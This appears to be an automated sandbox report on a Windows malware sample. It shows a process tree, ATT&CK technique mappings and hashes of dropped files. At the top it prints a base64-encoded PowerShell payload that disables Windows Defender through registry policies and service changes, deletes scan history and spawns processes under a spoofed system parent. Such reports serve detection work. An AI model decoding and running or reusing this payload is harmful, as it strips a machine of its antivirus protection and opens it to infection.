ABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
-
C:\Program Files\Windows Defender\MSASCuiL.exe"C:\Program Files\Windows Defender\MSASCuiL.exe"6⤵
-
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass5⤵
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77WindowsDefender.exe4⤵
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\ResolveExpand.m3u"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\ResolveExpand.m3u"1⤵
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\CompressUndo.TS"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.0.1091168057\176540802" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1696 -prefsLen 20845 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e2e4349-389e-4287-88bb-9a783c7b47bd} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 1780 16d6c8f9558 gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.1.59767972\1742687097" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20926 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0a27977-fd1a-4e74-b985-a2f51cf7f52e} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 2136 16d6c7f9558 socket3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.2.75706711\292141695" -childID 1 -isForBrowser -prefsHandle 2936 -prefMapHandle 2932 -prefsLen 21029 -prefMapSize 233444 -jsInitHandle 1256 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f79b5d38-cb46-4b0d-b2ae-f8191b31ee76} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 2768 16d708a9e58 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.3.262094866\17473787" -childID 2 -isForBrowser -prefsHandle 3496 -prefMapHandle 3476 -prefsLen 26214 -prefMapSize 233444 -jsInitHandle 1256 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd8628be-c63b-4626-8d6d-0b9ebc62e952} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 3508 16d6186d958 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.4.235732427\1326271062" -childID 3 -isForBrowser -prefsHandle 3876 -prefMapHandle 3872 -prefsLen 26214 -prefMapSize 233444 -jsInitHandle 1256 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2aae8eb-a822-4bfe-bce9-e200005368a5} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 3860 16d71ed7e58 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.5.479879854\89548799" -childID 4 -isForBrowser -prefsHandle 4860 -prefMapHandle 4856 -prefsLen 26354 -prefMapSize 233444 -jsInitHandle 1256 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb1745a8-eb19-45fd-bc70-4ebe3afe6a39} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 4868 16d72a74258 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.6.130184589\1899292799" -childID 5 -isForBrowser -prefsHandle 5004 -prefMapHandle 5008 -prefsLen 26354 -prefMapSize 233444 -jsInitHandle 1256 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65f9568d-738f-471d-8e33-e609e72ae3d6} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 4992 16d73132b58 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.7.1031303848\2048635294" -childID 6 -isForBrowser -prefsHandle 5156 -prefMapHandle 5160 -prefsLen 26354 -prefMapSize 233444 -jsInitHandle 1256 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c78112e0-57b3-4492-80a6-895b2ba9e14e} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 5236 16d73135b58 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4996.8.2013684507\827921287" -childID 7 -isForBrowser -prefsHandle 4516 -prefMapHandle 4376 -prefsLen 26433 -prefMapSize 233444 -jsInitHandle 1256 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {184243db-a707-4fad-88b2-79e40e964f38} 4996 "\\.\pipe\gecko-crash-server-pipe.4996" 3868 16d61865358 tab3⤵
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4341⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
5Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1024KB
MD5d998db6bb78f1336ff0e927205cd5dcd
SHA14d4a205d698b61b661514654b3917375f8ab644a
SHA25632bce0ec12f35821550b935f0f9d841c1dcb83e9316c804190d0aa26881e9d9f
SHA512c8e05fd8ab522baeab3742ceec64eea154ebb72f9408c82babec3d01ecad67886626c13a126b9290074d4149eef1be56853e9aea72c455147fe3f7039bbfe21f
-
Filesize
40B
MD5bde7940abd784d91f9236ffeea928533
SHA11d994b328619ac40307ec13707ed98f692e43e01
SHA256e54c95fa9510bd1c09c70fbdd534fa96b9add223be9158e32c12173572b3ecf5
SHA51261cdbdfe8a9df3aec8a4281912075cef72072c9d6f96ab74e201fe532af138883b50223fee268a8e0121afebcfce1c8036307cfb66afcf2582dc76eca27b4f30
-
Filesize
32KB
MD569e3a8ecda716584cbd765e6a3ab429e
SHA1f0897f3fa98f6e4863b84f007092ab843a645803
SHA256e0c9f1494a417f356b611ec769b975a4552c4065b0bc2181954fcbb4b3dfa487
SHA512bb78069c17196da2ce8546046d2c9d9f3796f39b9868b749ecada89445da7a03c9b54a00fcf34a23eb0514c871e026ac368795d2891bbf37e1dc5046c29beaaa
-
Filesize
24B
MD554cb446f628b2ea4a5bce5769910512e
SHA1c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA5128f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0
-
Filesize
48B
MD56f06a52822deecfc62076f97b82544ab
SHA150fa1f584b676e9600c6dd0dac6f3d1c07e13b7f
SHA256489e330f502e386e7f0e36a679af6ad6a189eb1308b4643e4268fdb76767b241
SHA51255d67033eeca42b5800fa357fdb8552e8d77af38ae9829a60418219d16df896ec131fa067617480d556ac47d49cff8bd83a05056dbd4cfbce5381197302017e5
-
Filesize
8KB
MD5cf89d16bb9107c631daabf0c0ee58efb
SHA13ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA5128cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
8KB
MD50962291d6d367570bee5454721c17e11
SHA159d10a893ef321a706a9255176761366115bedcb
SHA256ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
Filesize
8KB
MD541876349cb12d6db992f1309f22df3f0
SHA15cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e
-
Filesize
20KB
MD53eea0768ded221c9a6a17752a09c969b
SHA1d17d8086ed76ec503f06ddd0ac03d915aec5cdc7
SHA2566923fd51e36b8fe40d6d3dd132941c5a693b02f6ae4d4d22b32b5fedd0e7b512
SHA512fb5c51adf5a5095a81532e3634f48f5aedb56b7724221f1bf1ccb626cab40f87a3b07a66158179e460f1d0e14eeb48f0283b5df6471dd7a6297af6e8f3efb1f9
-
Filesize
256KB
MD5ae5435fe2843b7fe103896da76dbc6d0
SHA1724e73e21ec952f0c9d73ea8feb27340a34c4a88
SHA256f71bbc7181bf54163fd98721dfc9d20d1751dce9244d4c084023071cbfbe728a
SHA51251bba323cb850b2f45f23a5ee92e21de701f308e4fc3559c03938b3bb9c4b66c2867af05462979ad9d8406fe051e2bdde3096b133276b78464d1791a2a268b7f
-
Filesize
148KB
MD590a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA2567cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2
-
Filesize
329B
MD5cb48901de71271b003931b7f7cef03ff
SHA1555da798fee6d1848b1c5b7abffc2a7fbfea68b9
SHA2568f84de55f7c3b2b64bfb7356a654a0df2610d97f1623b4d79dd092c925a23d63
SHA512ab32b18eff17b56320e36b850513bf58c2b9ad2a24f65ee687ea14a566cb6042c237b7e58d012e3b8b4d0758cc8caa184665266338d5ab828259185f7239b265
-
Filesize
291B
MD58777dcc2097656185b82d5fd900f1c1b
SHA1e75730b104246a4e94c509e26c10dee02d4906b2
SHA25606c2e370b8fb8cf870fdc718ec26b384784748d0edffef824775900d05a5d803
SHA5126895228cc314ad2af65af129ca70120aa2f90de09d4616227eb2033c9eb26fe9aaec51f0f83e8e5ae6cb9eea26dc92a77809108916862cafe51a86028a458ae3
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
805B
MD5c67a55734804c21b00f007d0fa9aceb4
SHA166cbd624169c608a6fc91766443aefd83433b294
SHA2563d9254779e1223c00ed7b937442deb6525d21928967d9c7f4185a69565023ef6
SHA51212fa3277de7a47df67ac6cc36f61324b612c58f7284b49f26b8e4b7d0e6ccda84cd0c407eed9fd4c4050b6c1bd0657bf21df72a94a1c76a208a30c981aa5b9d5
-
Filesize
609B
MD5e6fd23e0a3fa1bb22af1f51b918c29b0
SHA12ff11026a3264353ce623b0899fc9068e8f64bb4
SHA25641e6a8ec3381ca88f8f31996ec684b909dcfde526cf7164c1ea3981929a19ccc
SHA512748c6c009c5477db6f060c785f17b0e77c4ba4b6b7d0bb353ecd88dddf30c4cd86224dba3bcb22def7b8dcbadbe57caa3a81ee5b146f69b1be967886af422df6
-
Filesize
836B
MD5f6ffafa5cb8450aecead6a17af933b9c
SHA1b7ace0bb096297718512fbe241247970ff4613d8
SHA2563887298621a064c5663a5ab3e32e4b9c90ebd69594c81c7a406ef8d2bb6b0c3d
SHA512fafe2a0b6a5ef7124a24d907f8801ace4015a8ea9877690cd7b0a0aed72d84219c2c60b204bfda2d65dfa0f33c7aea70659be3c27a12879c7d33a3a0b9ab76b0
-
Filesize
202B
MD53289bf2a2cd8541f5b27a312064a2ba2
SHA17b9d7fb1361e9811df4a2e9a72aee10a0048d1d3
SHA2567912cfd10e8323d62d3ba8b0b992469831c4bd8c42c7980a513913be3e1739b5
SHA51282a284f111ecd3322b90bda373fe3fbd956eedbd9d0f80f8364c3b7431c46a1a82873d5788b92a0ef2934aeaac06f56d079b0771eb19a46d2dea71d9dcfe4abc
-
Filesize
5KB
MD54dc2d9112de56d7dbecda9fc4b0e5307
SHA16b613ea2c3e0b3eec21ae6420eba052d19b2f57b
SHA256a9889c054f867ef9062d1534e4055cf5aaa4226aeb858d9e5eacd9e7a54b5235
SHA5129abf0717690eb70f24bf7e9c641c97fa46368cda779267dd79a55cd9b2fe3892cbede1dbe13f2230ad8162aaa432cebb4c76fef46bd962d20d141bb2df86e2a6
-
Filesize
5KB
MD55ada3c9c647ddb391736e104a1bcbad4
SHA187d92d42e7e2ac52fd9fd05ce720aa3106ebfbe7
SHA256cbcd997784175cbc1c8a9d9e70f2e27961cd10f2591f26c87a5d339a9dca7bf0
SHA5121b08eef2e8f8e5dd6e4edf6b7094e205d73cea46f3f8455ccd3e6d0552e7d7a2dce50273ebd799effa3a000030ce5186f38cc42da488071de1b3a601d14d288e
-
Filesize
5KB
MD5fc9bfe5b016cc7df14a759a964cfd30a
SHA18dbc6fa6bd1ec58638edc0686779d4652caa0c34
SHA256401f5246b8e3d949e9b81fd148981e14a6d864ec6c644c841d93d3ddd418e9b0
SHA512f91645bbe44b6d118d63a1363922110ae04677a146f1fea471ea1b15587c2cf4e8ffc16116a2e83ceaa9c26b993483fdaa65eef1bfd8b74819b289dd2012890a
-
Filesize
5KB
